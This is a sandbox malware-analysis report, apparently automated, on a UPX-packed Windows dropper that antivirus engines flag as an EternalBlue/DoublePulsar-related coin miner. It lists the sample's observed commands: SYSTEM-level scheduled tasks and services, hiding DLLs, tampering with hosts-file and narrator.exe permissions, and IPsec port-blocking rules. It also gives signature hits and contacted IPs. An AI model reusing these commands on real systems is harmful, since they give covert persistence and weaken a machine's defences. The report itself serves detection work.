cmdline	schtasks /create /TN "At1" /TR "C:\Windows\Fonts\Mysql\nei.bat" /SC weekly /ST 11:30:00 /RU SYSTEM
cmdline	svchost install "MicrosoftMysql" C:\Windows\Fonts\Mysql\cmd.bat
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo y"
cmdline	svchost stop "MicrosoftFonts"
cmdline	svchost install MicrosoftMysql "C:\Windows\Fonts\Mysql\cmd.bat"
cmdline	schtasks /delete /tn At2 /f
cmdline	schtasks /create /TN "At2" /TR "C:\Windows\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM

Drops a binary and executes it (6 events)

file	C:\Users\test22\AppData\Local\Temp\tem.vbs
file	C:\Windows\Fonts\sql.bat
file	C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe
file	C:\Windows\Fonts\Mysql\ctfmon.exe
file	C:\Windows\Fonts\Mysql\same.bat
file	C:\Windows\Fonts\Mysql\svchost.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe
file	C:\Users\test22\AppData\Local\Temp\c64.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW June 5, 2023, 5:57 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c ping 127.0.0.1 -n 1 && del /f/q "C:\windows\inf\ctfmona.exe" filepath: cmd.exe	1	1
ShellExecuteExW June 5, 2023, 5:57 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c del "C:\windows\inf\sp123.exe" > nul filepath: C:\Windows\System32\cmd.exe	1	1
ShellExecuteExW June 5, 2023, 5:57 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe parameters: "C:\windows\inf\vers.exe" filepath: C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe	1	1
ShellExecuteExW June 5, 2023, 5:58 p.m.	show_type: 0 filepath_r: C:\Windows\Fonts\Mysql\same.bat parameters: filepath: C:\Windows\Fonts\Mysql\same.bat	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (39 events)

Time & API	Arguments	Status	Return
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: smss.exe process_identifier: 232	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: csrss.exe process_identifier: 308	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: wininit.exe process_identifier: 344	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: csrss.exe process_identifier: 356	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: winlogon.exe process_identifier: 392	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: services.exe process_identifier: 436	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: lsass.exe process_identifier: 452	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: svchost.exe process_identifier: 560	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: svchost.exe process_identifier: 636	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: svchost.exe process_identifier: 716	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: svchost.exe process_identifier: 780	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: svchost.exe process_identifier: 824	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: audiodg.exe process_identifier: 896	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: svchost.exe process_identifier: 984	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: svchost.exe process_identifier: 340	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: spoolsv.exe process_identifier: 1060	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: taskhost.exe process_identifier: 1112	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: svchost.exe process_identifier: 1120	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: dwm.exe process_identifier: 1192	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: explorer.exe process_identifier: 1236	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: svchost.exe process_identifier: 1744	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: pw.exe process_identifier: 1888	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: SearchIndexer.exe process_identifier: 1652	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: mobsync.exe process_identifier: 1700	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: pw.exe process_identifier: 1872	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: wsqmcons.exe process_identifier: 1208	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: sdclt.exe process_identifier: 872	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: taskhost.exe process_identifier: 184	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: SearchProtocolHost.exe process_identifier: 1720	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: cmd.exe process_identifier: 536	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: conhost.exe process_identifier: 1372	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: SearchFilterHost.exe process_identifier: 1492	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: c64.exe process_identifier: 800	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: pw.exe process_identifier: 2084	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: net.exe process_identifier: 2144	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: conhost.exe process_identifier: 2180	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: ctfmona.exe process_identifier: 2244	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: net1.exe process_identifier: 2304	1	1
Process32NextW June 5, 2023, 5:57 p.m.	snapshot_handle: 0x000000dc process_name: net1.exe process_identifier: 3211380		0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00335c00', u'virtual_address': u'0x00194000', u'entropy': 7.999943002937759, u'name': u'UPX1', u'virtual_size': u'0x00336000'}

entropy

7.99994300294

description

A section with a high entropy has been found

entropy

0.9933514657

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 5, 2023, 5:57 p.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1	0

Yara rule detected in process memory (40 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Created a process named as a common system process (5 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW June 5, 2023, 5:59 p.m.	thread_identifier: 204 thread_handle: 0x0000001c process_identifier: 2040 current_directory: C:\Windows\Fonts\Mysql filepath: C:\Windows\Fonts\Mysql\svchost.exe track: 1 command_line: svchost stop "MicrosoftFonts" filepath_r: C:\Windows\Fonts\Mysql\svchost.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW June 5, 2023, 5:59 p.m.	thread_identifier: 1160 thread_handle: 0x00000084 process_identifier: 1176 current_directory: C:\Windows\Fonts\Mysql filepath: C:\Windows\Fonts\Mysql\svchost.exe track: 1 command_line: svchost stop "MicrosoftMysql" filepath_r: C:\Windows\Fonts\Mysql\svchost.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000001c	1	1
CreateProcessInternalW June 5, 2023, 5:59 p.m.	thread_identifier: 3092 thread_handle: 0x0000001c process_identifier: 3784 current_directory: C:\Windows\Fonts\Mysql filepath: C:\Windows\Fonts\Mysql\svchost.exe track: 1 command_line: svchost install MicrosoftMysql "C:\Windows\Fonts\Mysql\cmd.bat" filepath_r: C:\Windows\Fonts\Mysql\svchost.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW June 5, 2023, 5:59 p.m.	thread_identifier: 760 thread_handle: 0x00000084 process_identifier: 2076 current_directory: C:\Windows\Fonts\Mysql filepath: C:\Windows\Fonts\Mysql\svchost.exe track: 1 command_line: svchost install MicrosoftMysql C:\Windows\Fonts\Mysql\cmd.bat filepath_r: C:\Windows\Fonts\Mysql\svchost.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000001c	1	1
CreateProcessInternalW June 5, 2023, 5:59 p.m.	thread_identifier: 2648 thread_handle: 0x0000001c process_identifier: 3868 current_directory: C:\Windows\Fonts\Mysql filepath: C:\Windows\Fonts\Mysql\svchost.exe track: 1 command_line: svchost install "MicrosoftMysql" C:\Windows\Fonts\Mysql\cmd.bat filepath_r: C:\Windows\Fonts\Mysql\svchost.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1

The executable is compressed using UPX (2 events)

section	UPX0				description	Section name indicates UPX
section	UPX1				description	Section name indicates UPX

Uses Windows utilities for basic Windows functionality (50 out of 55 events)

cmdline	net stop mssecsvc2.0
cmdline	net stop mssecsvc2.1
cmdline	schtasks /delete /tn At1 /f
cmdline	attrib +s +h +r C:\Windows\Fonts\Mysql\Eternalblue.dll
cmdline	attrib +s +h +r C:\Windows\Fonts\Mysql\Eternalblue2.dll
cmdline	"C:\Windows\system32\cmd.exe" /c del "C:\windows\inf\sp123.exe" > nul
cmdline	attrib +r C:\Windows\Fonts\Mysql\file.txt
cmdline	C:\Windows\System32\cmd.exe /c del "C:\windows\inf\sp123.exe" > nul
cmdline	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\windows\inf\ctfmona.exe"
cmdline	sc config PolicyAgent start= AUTO
cmdline	ping 127.1 -n 7
cmdline	ping 127.0.0.1 -n 1
cmdline	net stop Bcdefg
cmdline	netsh ipsec static del all
cmdline	cmd.exe /c ping 127.0.0.1 -n 1 && del /f/q "C:\windows\inf\ctfmona.exe"
cmdline	attrib +s +h +r C:\Windows\Fonts\Mysql\Doublepulsar2.dll
cmdline	netsh ipsec static add filterlist name=denylist
cmdline	netsh ipsec static add filterlist name=Allowlist
cmdline	schtasks /create /TN "At1" /TR "C:\Windows\Fonts\Mysql\nei.bat" /SC weekly /ST 11:30:00 /RU SYSTEM
cmdline	attrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts
cmdline	net stop serivecs
cmdline	attrib -s -h -r C:\Windows\Fonts\Mysql
cmdline	net stop "MicrosoftMysql"
cmdline	netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
cmdline	net stop "MicrosoftMssql"
cmdline	netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
cmdline	netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
cmdline	netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
cmdline	sc delete serivecs
cmdline	netsh ipsec static add filteraction name=deny action=block
cmdline	attrib +s +h +r C:\Windows\Fonts\Mysql\Doublepulsar.dll
cmdline	sc delete SSDPSRVS
cmdline	ipconfig /flushdns
cmdline	ping 127.0.0.1 -n 20
cmdline	sc delete "MicrosoftMssql"
cmdline	C:\Windows\system32\attrib +s +h +r C:\Windows\Fonts\sqlser.exe
cmdline	attrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts
cmdline	net stop WSSDPSRVS
cmdline	sc delete Bcdefg
cmdline	netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
cmdline	net stop MicrosoftMysql
cmdline	netsh ipsec static set policy name=Aliyun assign=y
cmdline	ping 127.1 -n 3
cmdline	sc delete mssecsvc2.1
cmdline	sc delete mssecsvc2.0
cmdline	schtasks /delete /tn At2 /f
cmdline	netsh ipsec static add filteraction name=Allow action=permit
cmdline	sc delete "MicrosoftMysql"
cmdline	sc start PolicyAgent
cmdline	netsh ipsec static add policy name=Aliyun

Enumerates services, possibly for anti-virtualization (1 event)

Time & API	Arguments	Status	Return	Repeated
EnumServicesStatusW June 5, 2023, 5:59 p.m.	service_handle: 0x0055fe00 service_type: 59 service_status: 3		0	0

Installs itself for autorun at Windows startup (9 events)

service_name	serivces	service_path	C:\Users\test22\AppData\Local\Temp\%SystemRoot%\System32\svchost.exe -k "serivces"
reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\serivces\Parameters\ServiceDll	reg_value	C:\Windows\system32\28915125.dll
service_name	HOSTSVC	service_path	C:\Users\test22\AppData\Local\Temp\%SystemRoot%\System32\svchost.exe -k "HOSTSVC"
reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HOSTSVC\Parameters\ServiceDll	reg_value	C:\Windows\system32\1b9376a.dll
service_name	MicrosoftMysql	service_path	C:\Windows\Fonts\Mysql\svchost.exe
service_name	MicrosoftMysql	service_path	C:\Windows\Fonts\Mysql\svchost.exe
service_name	MicrosoftMysql	service_path	C:\Windows\Fonts\Mysql\svchost.exe
cmdline	schtasks /create /TN "At1" /TR "C:\Windows\Fonts\Mysql\nei.bat" /SC weekly /ST 11:30:00 /RU SYSTEM
cmdline	schtasks /create /TN "At2" /TR "C:\Windows\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM

Created a service where a service was also not started (5 events)

Time & API	Arguments	Status	Return
CreateServiceA June 5, 2023, 5:57 p.m.	service_start_name: start_type: 2 password: display_name: Serivces Manager filepath: C:\Users\test22\AppData\Local\Temp\%SystemRoot%\System32\svchost.exe -k "serivces" service_name: serivces filepath_r: %SystemRoot%\System32\svchost.exe -k "serivces" desired_access: 983551 service_handle: 0x00549490 error_control: 0 service_type: 272 service_manager_handle: 0x00549530	1	5543056
CreateServiceW June 5, 2023, 5:57 p.m.	service_start_name: start_type: 2 password: display_name: Microsoft .Net Framework COM+ Support filepath: C:\Users\test22\AppData\Local\Temp\%SystemRoot%\System32\svchost.exe -k "HOSTSVC" service_name: HOSTSVC filepath_r: %SystemRoot%\System32\svchost.exe -k "HOSTSVC" desired_access: 983551 service_handle: 0x007cd698 error_control: 1 service_type: 272 service_manager_handle: 0x007cd738	1	8181400
CreateServiceW June 5, 2023, 5:59 p.m.	service_start_name: start_type: 2 password: display_name: MicrosoftMysql filepath: C:\Windows\Fonts\Mysql\svchost.exe service_name: MicrosoftMysql filepath_r: C:\Windows\Fonts\Mysql\svchost.exe desired_access: 983551 service_handle: 0x004efe48 error_control: 1 service_type: 16 service_manager_handle: 0x004efee8	1	5176904
CreateServiceW June 5, 2023, 5:59 p.m.	service_start_name: start_type: 2 password: display_name: MicrosoftMysql filepath: C:\Windows\Fonts\Mysql\svchost.exe service_name: MicrosoftMysql filepath_r: C:\Windows\Fonts\Mysql\svchost.exe desired_access: 983551 service_handle: 0x00000000 error_control: 1 service_type: 16 service_manager_handle: 0x004cfec8		0
CreateServiceW June 5, 2023, 5:59 p.m.	service_start_name: start_type: 2 password: display_name: MicrosoftMysql filepath: C:\Windows\Fonts\Mysql\svchost.exe service_name: MicrosoftMysql filepath_r: C:\Windows\Fonts\Mysql\svchost.exe desired_access: 983551 service_handle: 0x00000000 error_control: 1 service_type: 16 service_manager_handle: 0x008afee8		0

Deletes executed files from disk (1 event)

file	C:\Windows\Fonts\Mysql\Doublepulsar2.dll

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2440 resumed a thread in remote process 2632
Process injection	Process 2860 resumed a thread in remote process 2196
NtResumeThread June 5, 2023, 5:57 p.m.	thread_handle: 0x00000230 suspend_count: 1 process_identifier: 2632	1	0	0
NtResumeThread June 5, 2023, 5:57 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2196	1	0	0

Uses suspicious command line tools or Windows utilities (10 events)

cmdline	cacls "C:\Windows\Fonts\Mysql" /g everyone:f
cmdline	cacls C:\Windows\system32\narrator.exe /e /d "network service"
cmdline	cacls C:\Windows\system32\narrator.exe /e /g Users:r
cmdline	cacls C:\Windows\system32\narrator.exe /e /g Administrators:r
cmdline	cacls C:\Windows\system32\Drivers\etc\hosts /d everyone
cmdline	cacls C:\Windows\system32\narrator.exe /e /d SERVICE
cmdline	cacls C:\Windows\system32\narrator.exe /e /g system:r
cmdline	cacls C:\Windows\system32\Drivers\etc\hosts /g users:f
cmdline	cacls "C:\Windows\Fonts\Mysql\." /g everyone:f
cmdline	cacls C:\Windows\system32\narrator.exe /g Administrators:f

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /TN "At1" /TR "C:\Windows\Fonts\Mysql\nei.bat" /SC weekly /ST 11:30:00 /RU SYSTEM
cmdline	schtasks /create /TN "At2" /TR "C:\Windows\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM

File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)

Lionic	Trojan.Win32.EquationDrug.4!c
tehtris	Generic.Malware
MicroWorld-eScan	Gen:Variant.Strictor.151533
ClamAV	Win.Malware.Temr-7070541-0
CAT-QuickHeal	Trojan.IGENERIC
McAfee	GenericRXNL-LA!B1E73EE6B76C
Cylance	unsafe
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	Backdoor:Win64/Miancha.987e697b
K7GW	Trojan ( 0059f8341 )
K7AntiVirus	Trojan ( 0059f8341 )
BitDefenderTheta	Gen:NN.ZexaF.36132.opKfai5DFjhb
Cyren	W32/S-776111c5!Eldorado
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (moderate confidence)
ESET-NOD32	a variant of Win32/TrojanDropper.FlyStudio.CO
APEX	Malicious
Paloalto	generic.ml
Cynet	Malicious (score: 100)
Kaspersky	Trojan.Win32.EquationDrug.ads
BitDefender	Gen:Variant.Strictor.151533
Rising	Dropper.NSABuffMiner!1.DD91 (CLOUD)
Sophos	Mal/Generic-S
F-Secure	Trojan.TR/AD.DPulsarShellcode.ykami
VIPRE	Gen:Variant.Strictor.151533
TrendMicro	TROJ_GEN.R002C0PC323
McAfee-GW-Edition	BehavesLike.Win32.Backdoor.wc
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.b1e73ee6b76cdb99
Emsisoft	Gen:Variant.Strictor.151533 (B)
Ikarus	Trojan.Win32.CoinMiner
GData	Win32.Application.PSE.18M7LFX
Avira	TR/AD.DPulsarShellcode.ykami
Antiy-AVL	Trojan/Win32.FlyStudio.a
Xcitium	Packed.Win32.MUPX.Gen@24tbus
Arcabit	Trojan.Strictor.D24FED
ZoneAlarm	UDS:DangerousObject.Multi.Generic
Microsoft	HackTool:Win32/Eqtonex.H
Google	Detected
ALYac	Gen:Variant.Strictor.151533
MAX	malware (ai score=85)
DeepInstinct	MALICIOUS
Malwarebytes	Trojan.FlyStudio
TrendMicro-HouseCall	TROJ_GEN.R002C0PC323
Tencent	Win32.Trojan.Equationdrug.Wmhl
Yandex	Trojan.GenAsa!tXL2U6oM+cg
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/CoinMiner.65CA!tr

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	124.172.232.35:7709
dead_host	112.175.114.17:1433

c64.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All